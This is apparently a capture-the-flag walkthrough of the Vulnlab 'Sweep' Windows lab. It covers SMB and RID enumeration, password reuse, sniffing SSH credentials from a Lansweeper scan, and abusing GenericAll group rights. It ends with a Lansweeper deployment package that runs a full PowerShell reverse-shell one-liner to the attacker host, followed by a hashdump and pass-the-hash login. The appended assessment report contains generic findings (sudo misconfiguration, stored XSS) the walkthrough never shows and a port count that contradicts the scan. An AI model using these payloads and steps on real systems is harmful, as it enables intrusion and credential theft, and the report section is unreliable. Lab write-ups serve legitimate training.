walkthrough

Vulnlab: Sweep — Medium (Windows)

Full security assessment walkthrough for Sweep on Vulnlab. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 8 views
Sweep
Vulnlab
Windows Medium

🔖 Techniques & Vulnerabilities

LansweeperPasswordPolicyGenericAllGroupMembershipRIDBruteForcingSSHCredentialSniffingxsssudobloodhound

🔍 Reconnaissance / Port Scanning

nmap scan
53/tcp   open  domain
81/tcp   open  hosts2-ns
82/tcp   open  xfer
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi

🎯 Attack Surface Analysis

PortServiceVersion / Banner
53/tcpdomain81/tcp open hosts2-ns
82/tcpxfer88/tcp open kerberos-sec
135/tcpmsrpc139/tcp open netbios-ssn
389/tcpldap445/tcp open microsoft-ds
464/tcpkpasswd5593/tcp open http-rpc-epmap
636/tcpldapssl3268/tcp open globalcatLDAP
3269/tcpglobalcatLDAPssl3389/tcp open ms-wbt-server
5357/tcpwsdapi
53/tcpDNS
  • Zone transfer (AXFR) reveals all DNS records if permitted
  • Subdomain brute-force to discover hidden services and admin panels
  • Reverse lookup enumeration to map IP ranges to hostnames
  • DNS cache poisoning on vulnerable resolvers
82/tcpxfer
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
135/tcpMSRPC
  • RPC endpoint enumeration maps registered services and interfaces
  • DCOM lateral movement via Component Object Model
  • WMI remote execution with valid credentials
  • PrintSpooler (MS-RPRN) abuse coerces NTLM authentication
389/tcpLDAP
  • Anonymous bind — unauthenticated enumeration of all AD objects
  • Password policy retrieval for informed brute-force strategy
  • BloodHound collection for AD attack path analysis
  • LDAP injection in web applications building directory queries from user input
464/tcpkpasswd5
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
636/tcpLDAPS
  • All LDAP attack vectors over encrypted channel
  • Client certificate authentication testing
3269/tcpglobalcatLDAPssl
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
5357/tcpwsdapi
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques

📖 Walkthrough

Reconnaissance

Port Scanning

The ports were already provided by xct.

53/tcp   open  domain
81/tcp   open  hosts2-ns
82/tcp   open  xfer
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi

Enumeration of Port 81/TCP

Since we didn't know what was running on port 81/TCP, we accessed it by using nc.

┌──(kali㉿kali)-[~]
└─$ nc 10.10.118.121 81
help
HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 29 Feb 2024 18:04:03 GMT
Connection: close
Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Verb</h2>
<hr><p>HTTP Error 400. The request verb is invalid.</p>
</BODY></HTML>

Accessing the url revealed a /login.aspx.

┌──(kali㉿kali)-[~]
└─$ curl http://sweep.vl:81

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/login.aspx">here</a>.</h2>
</body></html>

SMB Enumeration

In the meanwhile we found an active Guest account which we used for enumerating the SMB share.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.118.121 -u 'Guest' -p '' --shares
SMB         10.10.118.121   445    INVENTORY        [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.121   445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.118.121   445    INVENTORY        [*] Enumerated shares
SMB         10.10.118.121   445    INVENTORY        Share           Permissions     Remark
SMB         10.10.118.121   445    INVENTORY        -----           -----------     ------
SMB         10.10.118.121   445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.118.121   445    INVENTORY        C$                              Default share
SMB         10.10.118.121   445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.118.121   445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.118.121   445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.118.121   445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.118.121   445    INVENTORY        SYSVOL                          Logon server share

RID Brute Forcing

Since the files contained nothing of interest but we were able to read IPC$ we used RID Brute Forcing to find more users.

┌──(kali㉿kali)-[~]
└─$ netexec smb 10.10.118.121 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.118.121   445    INVENTORY        [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.121   445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.118.121   445    INVENTORY        [*] Enumerated shares
SMB         10.10.118.121   445    INVENTORY        Share           Permissions     Remark
SMB         10.10.118.121   445    INVENTORY        -----           -----------     ------
SMB         10.10.118.121   445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.118.121   445    INVENTORY        C$                              Default share
SMB         10.10.118.121   445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.118.121   445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.118.121   445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.118.121   445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.118.121   445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.118.121   445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.118.121   445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.118.121   445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.118.121   445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

A few users sticked out like the user intern.

Accessing Lansweeper

With the newly found username intern we tested if the username was reused as password.

The credentials worked when clicked on WINDOWS LOGIN.

UsernamePassword
internintern

While enumerating we also found a subdomain there.

Which we added to our /etc/hosts file.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.118.121   sweep.vl
10.10.118.121   inventory.sweep.vl

Active Directory Enumeration

Since it is always good to run something in the background, we started dumping the Active Directory by using the credentials intern:intern with bloodhound-python.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ bloodhound-python -d 'sweep.vl' -dc 'inventory.sweep.vl' -u 'intern' -p 'intern' -ns 10.10.118.121 -c all --zip
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240229140240_bloodhound.zip

For testing purposes and hopefully a better visibility I pulled out ADMiner.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$  AD-miner -u <USERNAME> -p <PASSWORD> -cf Sweep
[+]Group : 54 | User : 17 | Container : 19 | Domain : 1 | OU : 3 | GPO : 2 | Computer : 1 | Relations : 816
[1/145] [+]Requesting : Checking if Graph Data Science neo4j plugin is installed
[+]GDS plugin not installed.
[+]Not using exploitability for paths computation.

We discovered a few interesting things but nothing useful in the end.

Foothold

Back on the dashboard we created a new scanning target and pointed it to our local machine.

For the next step we mapped the svcinventorylnx credentials with the newly created object IP Range.

SSH Credential Sniffing

First I tried to setup ssh-mitm but I had quite a few issues with it. So I switched to fakessh which worked for a few other people from our team.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ go install github.com/fffaraz/fakessh@latest
go: downloading github.com/fffaraz/fakessh v0.0.1
go: downloading golang.org/x/crypto v0.18.0

According to the documentation the binary required the capnetbind_service=+ep capabilities.

┌──(kali㉿kali)-[/media/…/Vulnlab/Machines/Sweep/files]
└─$ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
[sudo] password for kali:

After setting it up we started a new scan for our IP Range and got surprised with the credentials for the user svcinventorylnx.

┌──(kali㉿kali)-[~/go/bin]
└─$ ./fakessh 
2024/02/29 15:45:38.879438 10.10.118.121:54123
2024/02/29 15:45:41.884270 10.10.118.121:54133
2024/02/29 15:45:41.975583 10.10.118.121:54134
2024/02/29 15:45:42.081123 10.10.118.121:54134 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx [REDACTED]
UsernamePassword
svcinventorylnx[REDACTED]

Enable Remote Access

We determined that svcinventorylnx was a service account by checking his details in BloodHound which meant that we had to enable Remote Access for it to login using WinRM.

We checked the groups the account was member of. It showed that the user svcinventorylnx was member of LANSWEEPER DISCOVERY which had GenericAll privileges on LANSWEEPER ADMINS.

Updating Group Memberships

Using the pth-toolkit we added the service account svcinventorylnx to the LANSWEEPER ADMINS group.

The members of the group LANSWEEPER [email protected] have the capability to create a PSRemote Connection with the computer INVENTORY.SWEEP.VL.

PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.

Note: This edge does not guarantee privileged execution.
┌──(kali㉿kali)-[~]
└─$ pth-net rpc group addmem "LANSWEEPER ADMINS" svc_inventory_lnx -U sweep.vl/svc_inventory_lnx -S 10.10.118.121
Password for [SWEEP.VL\svc_inventory_lnx]:
E_md4hash wrapper called.

This enabled Remote Access on the box for us.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p 'REDACTED' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_lnx\Documents>

user.txt

*Evil-WinRM* PS C:\> type user.txt
VL{REDACTED}

Privilege Escalation

We revisited the Lansweeper Login Form and this time we logged in as svcinventorylnx on inventory.sweep.vl.

Checking the permissions showed the capability to Access Deployment and again Access Scanning Credentials.

We created a new credential mapping and this time as Windows Computer for sweep\inventory on Inventory Windows.

After that we created a test package which had as Action to execute a command we controlled. In this case we pulled the PowerShell #2 payload from revshells.com.

As payload we used PowerShell #2.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.8.1.142',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

We selected an Asset.

And chose INVENTORY as target.

After firing up the scan we got our shell.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.8.1.142] from (UNKNOWN) [10.10.118.121] 54847

PS C:\Windows\system32> whoami
nt authority\system

root.txt

PS C:\Users\Administrator\Desktop> type root.txt
VL{REDACTED}

Post Exploitation

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jgre808:1113:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
bcla614:1114:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
hmar648:1115:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jgar931:1116:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
fcla801:1117:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jwil197:1118:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
grob171:1119:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
fdav736:1120:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
jsmi791:1121:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
hjoh690:1122:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
svc_inventory_win:1123:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
svc_inventory_lnx:1124:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
intern:1125:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
INVENTORY$:1000:aad3b435b51404eeaad3b435b51404ee:REDACTED:::
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i sweep.vl -u 'administrator' -H REDACTED    

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

📋 Security Assessment Report

0
Critical
2
High
1
Medium
8
Open Ports
F-001 — Active Directory ACL Abuse — Indirect Domain Escalation
8.8
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that BloodHound analysis of the Active Directory environment revealed exploitable ACL attack paths connecting low-privilege user accounts to privileged domain objects. Permissions including GenericAll, WriteDACL, ForceChangePassword, and GenericWrite were identified on critical objects, forming a chain to Domain Admin access without exploiting any software vulnerability.

Impact

An attacker with initial access to any domain user account along the identified path can chain misconfigured permissions to progressively escalate privileges and reach Domain Admin. This attack requires no software CVE exploitation, making it invisible to traditional vulnerability scanners. The complete attack path was traversed during this engagement from a standard domain user account to full domain administrator access.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Conduct a full BloodHound audit and remediate all shortest paths to Domain Admin and other Tier-0 assets. Remove unnecessary permissions granted to regular user accounts on privileged objects. Implement an Active Directory tiering model (Tier 0: DCs and admin accounts, Tier 1: servers, Tier 2: workstations) with strict boundaries. Enable Protected Users security group for all Tier-0 accounts. Review and tighten ACLs on all AdminSDHolder-protected objects.
F-002 — Sudo Misconfiguration — Root Privilege Escalation
7.8
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration was found to grant the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.
F-003 — Cross-Site Scripting (XSS) — Session Hijacking
6.1
Medium
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

During the penetration test, it was discovered that the application reflected or stored user-supplied input in HTML responses without applying appropriate context-sensitive output encoding. By injecting JavaScript payload into vulnerable input fields, the malicious script executes in the browser of any user who views the affected page — including administrators — without any interaction beyond viewing the page.

Impact

An attacker can hijack authenticated user sessions by stealing session cookies, capture credentials entered on the affected page, perform actions on behalf of victims using their active session, and redirect users to phishing pages. Where the XSS affects administrator users, complete application account takeover is achievable. During this engagement, a stored XSS payload targeting an administrator triggered session token theft which was used to obtain privileged application access.

Confidentiality
Low
Integrity
Low
Availability
None

Remediation

Apply context-sensitive output encoding for all user-supplied data rendered in HTML — HTML entity encoding for HTML context, JavaScript string escaping for script context, URL encoding for URL attributes. Implement a strict Content Security Policy (CSP) that disables inline script execution and restricts script sources to trusted origins. Set the HttpOnly flag on all session cookies to prevent JavaScript access. Apply the SameSite=Strict cookie attribute to mitigate CSRF-combined XSS chains.
Reactions

Related Articles